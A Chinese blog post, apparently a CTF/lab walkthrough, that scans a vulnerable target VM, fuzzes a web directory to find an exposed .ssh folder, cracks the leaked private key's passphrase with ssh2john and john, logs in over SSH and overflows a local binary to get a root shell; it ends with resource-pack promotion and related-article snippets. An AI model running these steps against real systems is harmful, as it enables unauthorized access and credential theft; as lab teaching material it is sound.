一文分享SSH密钥泄露导致提权、溢出以及服务发现全流程,黑客技术零基础入门到精通教程建议收藏!

原创 于 2025-09-15 16:48:25 发布 · 286 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#ssh #web安全 #网络安全 #黑客技术入门 #网络攻防 #计算机 #渗透测试

首先启动我们的靶机和KALI(需要靶机环境请看下方扫描免费获取哦)

在这里插入图片描述

首先在KALI输入ifconfig查看网段
在这里插入图片描述

此处为80网段

接着输入

netdiscover -r 192.168.80.1/24 <IP/子网掩码>

在这里插入图片描述

除去192.168.80.1网关和192.168.80.2我们对剩下的进行ping检测

在这里插入图片描述

192.168.80.254丢包

在这里插入图片描述

192.168.80.149存活

我们对192.168.80.149进行服务发现

nmap -sV 192.168.80.149

在这里插入图片描述

结果开放端口为22/80/31337,我们对31337端口进行渗透

在浏览器输入

http://192.168.80.149:31337

在这里插入图片描述

提示Not Found错误,推测存在隐藏页,我们使用dirb工具对网站目录进行FUZZ

在这里插入图片描述

得到以下路径

---- Scanning URL: http://192.168.80.149:31337/ ----
+ http://192.168.80.149:31337/.bash_history (CODE:200|SIZE:19)                    
+ http://192.168.80.149:31337/.bashrc (CODE:200|SIZE:3526)                        
+ http://192.168.80.149:31337/.profile (CODE:200|SIZE:675)                        
+ http://192.168.80.149:31337/.ssh (CODE:200|SIZE:43)                             
+ http://192.168.80.149:31337/robots.txt (CODE:200|SIZE:70)

我们先访问robots.txt(搜索引擎检索文件)

在这里插入图片描述

接着访问taxes,得到flag1

然后我们访问.ssh,发现泄露的私钥,我们保存下来

在这里插入图片描述

http://192.168.80.149:31337/.ssh/id_rs
http://192.168.80.149:31337/.ssh/authorized_keys

我们把私钥copy到KALI,使用ssh2john将id_rsa转换为可识别的信息

ssh2john id_rsa > 123

我们使用字典对转换后的信息进行破解

zcat /usr/share/wordlists/rockyou.txt.gz | john --pipe --rules 123

在这里插入图片描述

得到密码starwars

我们打开authorized_keys,看到最后的ssh用户名simon

在这里插入图片描述

我们进行连接

ssh -i id_rsa simon@192.168.80.149

在这里插入图片描述

把刚刚破解的密码输进去

在这里插入图片描述

成功进入系统,然后我们cd到root目录
在这里插入图片描述

发现flag.txt但是没有权限打开,我们查看read_message.c文件

在这里插入图片描述

代码审计后发现可以进行溢出后提权

运行read_message后输入SimonAAAAAAAAAAAAAAA/bin/sh使其溢出后跳转至/bin/sh

在这里插入图片描述

成功提权,拿到flag3{das_bof_meister}

在这里插入图片描述

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,请看下方扫描即可前往获取

在这里插入图片描述
在这里插入图片描述

CTF之SSH密钥泄露实验
weixin_39096432的博客
02-04 550
CTF之SSH密钥泄露实验 实验目的: 获取目标主机上的flag 目标主机: 未知 攻 击 机: kali 192.168.114.130 分析: 目前没有任何目标主机的任何信息,此时该做什么呢? 思路:探测信息——构造畸形数据包——异常回应——get shell——拿到最高限 1、探测目标主机的IP地址(与攻击机在同一网段内): netdiscover -r 192.168.114.1/24 —— 在该地址段内探测存活的主机,识别到靶场。 继续用nmap探测靶场开启的服务以及版本: nmap
栋的月结 | 第一回合(定期更新、动态、架构、云技术、算法、后端、前端、收听/收看、英文、书籍、影视、好歌、新奇)[含泪总结.. 憋泪分享!]
纽雪澳诺加海美德的博客
02-01 2700
开篇词 大家好!以下是我在 2020 年 1 月 1 日至 31 日的所见、所闻、所学和所悟。 现在,我把它们安利给你们。   定期更新 原创专栏: 栋的周评 一文搞定 Linux 管理员手册:既简单又深刻 官方授: Baeldung Java 周评 符合官方许可: Spring 官方指南   动态 在我的《一文搞定》系列专栏里新增了: 《一文搞定 |...
笔记篇 SSH密钥泄露&&&&溢出&&服务发现
最新发布
2302_79513487的博客
09-27 556
运行read_message后输入SimonAAAAAAAAAAAAAAA/bin/sh使其溢出后跳转至/bin/sh。示Not Found错误,推测存在隐藏页,我们使用dirb工具对网站目录进行FUZZ。我们把私钥copy到KALI,使用ssh2john将id_rsa转换为可识别的信息。发现flag.txt但是没有限打开,我们查看read_message.c文件。结果开放端口为22/80/31337,我们对31337端口进行渗透。然后我们访问.ssh,发现泄露的私钥,我们保存下来。
SSH密钥
qq_37407863的博客
07-03 2458
当我们在渗透测试的过程中,拿到一台linux服务器shell,shell的限只是普通账号限的时候,我们可以利用ssh密钥来切换限相同的账号或者root账号。运维人员如果在服务器上使用ssh-keygen生成密钥对(id_rsa、id_rsa.pub),然后采用此密钥对进行远程登录,那么当他忘记把私钥(id_rsa)删除,且文件限可读,黑客就可以使用这个私钥进行用户登录,达到用户水平越或者升到root。使用命令查看系统中存在用户 注:”authorized_keys“文件用来登录的公钥验证
ssh私钥泄露
2301_80288776的博客
02-06 371
需要依靠密钥,也就是你必须为自己创建一对密钥,并把公用秘钥放在需要访问的服务器上,如果你要连接到ssh服务器上,客户端软件会向服务器发出请求,请求用你的私有钥匙进行安全验证。服务器收到请求后,先在服务器上你的主目录下寻找你的公用钥匙,然后把它和你发送过来的私有钥匙进行比较。所有传输数据都会被加密,但不能保证你正在连接的服务器是你相连接的服务器,可能是别的服务器冒充。基于字典的暴力破解,破解对方用户名和密码,通过ssh客户端连接到远程主机的ssh服务,实现对服务器的一定控制。--nmap-O靶场IP地址。
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、、小工具等
weixin_46280935的博客
09-10 6497
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授访问漏
CVE-2021-28041:一文读懂OpenSSH漏洞管理与快速响应机制
文章供了详细的修复方案和安全建议,并讨论了漏洞检测工具、防御策略以及不同环境下的适应性。此外,本文还探讨了快速响应机制的构建与优化,包括快速响应团队组织、自动化工具应用以及应急响应培训与演练。最后,...
数字证书学习-0- 相关概念了解
追梦程序员
09-25 501
安全领域的技术目的 但是归根结底,都是为了保障如下3个方面: 窃听风险(eavesdropping):第三方可以获知通信内容。 解决方案: 对信息进行加密和解密 篡改风险(tampering):第三方可以修改通信内容。 解决方案:使用数字摘要 对关键明文进行hash校验 冒充风险(pretending):第三方可以冒充他人身份参与通信。 解决方案:使用数字签名 1.专门请求发送公钥,2...
网络信息安全知识框架
浴血重生-学习空间
11-17 1076
网络信息安全知识框架
ssh私钥泄露获取主机
09-27
ssh认证结构 id_rsa:就是你的私钥,用于解密由公钥加密的内容; id_rsa.pub:公钥,很多服务器都是需要认证的,ssh认证是其中的一种。在客户端生成公钥,把生成的公钥添加到服务器,你以后连接服务器就不用每次都输入用户名合密码。 authorized_keys:认证关键文件,就是为了让两个linux机器之间使用ssh不需要用户名和密码。采用了数字签名RSA或者DSA来完成这个操作,用于存放多个公钥的文件。
CTF训练之现学现卖--SSH私钥泄露-附件资源
03-02
CTF训练之现学现卖--SSH私钥泄露-附件资源
SSH-私钥泄露
御七彩虹猫
04-12 6523
SSH-私钥泄露
SSH私钥泄露
weixin_45007073的博客
01-02 721
记录一下CTF比赛的私钥泄露漏洞吧。 镜像文件的下载地址 链接:https://pan.baidu.com/s/1dXbjQavKtVw7gC4paH02ww 取码:9xh1 SSH-私钥泄露 使用netdiscover发现存活主机 netdiscover -i eth0 发现目标主机 使用nmap收集目标主机信息。 nmap -sV 192.168.75.152 目标主机开放了22端口和http服务 使用浏览器没有找到任何有用的信息。 使用dirb探测web子目录。进行更深一
ssh_私钥泄露
qq_43682308的博客
11-19 476
探测靶场地址 先让物理机和靶机在同一网络中,可是net网络连接可是桥接 然后ifconfig找到物理机地址, Netdiscover -r ip/netmask 例如你的物理机ip为192.168.81.138, 这时你可以netdiscover -r 192.168.83.1/24 找到同网段的不认识的主机可能就是靶机地址 然后ping 这个靶机地址,能通,便可以进行接下来的测试 信息探测 挖掘开放服务信息:nmap -sV 192.168.83.139(靶场地址) 分析探测结果 每一个服务对应一
ssh私钥泄漏
weixin_51047454的博客
03-11 8255
ssh私钥泄漏 笔记
平台某项目-服务器SSH密钥与日志和命令记录泄露
weixin_40418457的博客
07-22 196
作者:天钧 对于特殊的路径,我比较喜欢收集,然后批量扫子域名,来获取到敏感信息,在之前的渗透里面,机缘巧合下,拿到了一次最贵的信息泄露的漏洞 路径链接如下 /.bashrc 个人配置记录 /.ssh/authorized_keys 公钥 更有意思的是 泄露了站点服务器所有的操作记录 /.bash_history 这才是捡到的洞,最后赏金 600 ...
[网络安全]ssh私钥泄露
hide_in_darkness的博客
10-16 2499
一、网络配置 虚拟机->可移动设备->网络适配器->设置 将靶场和kali虚拟机的网络连接模式改为一致(要么都是桥接模式,要么都是NAT模式,这里在本机测试建议使用NAT模式)
Spark零基础入门全攻略:实战+理论并进
Spark零基础入门线路指导是一份针对想要学习Spark技术的初学者的详细指南。这份资源主要针对对Spark技术感兴趣,特别是刚接触Spark的人群,旨在供一个系统的学习路径和理解Spark的基础知识。 首先,对于Spark的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值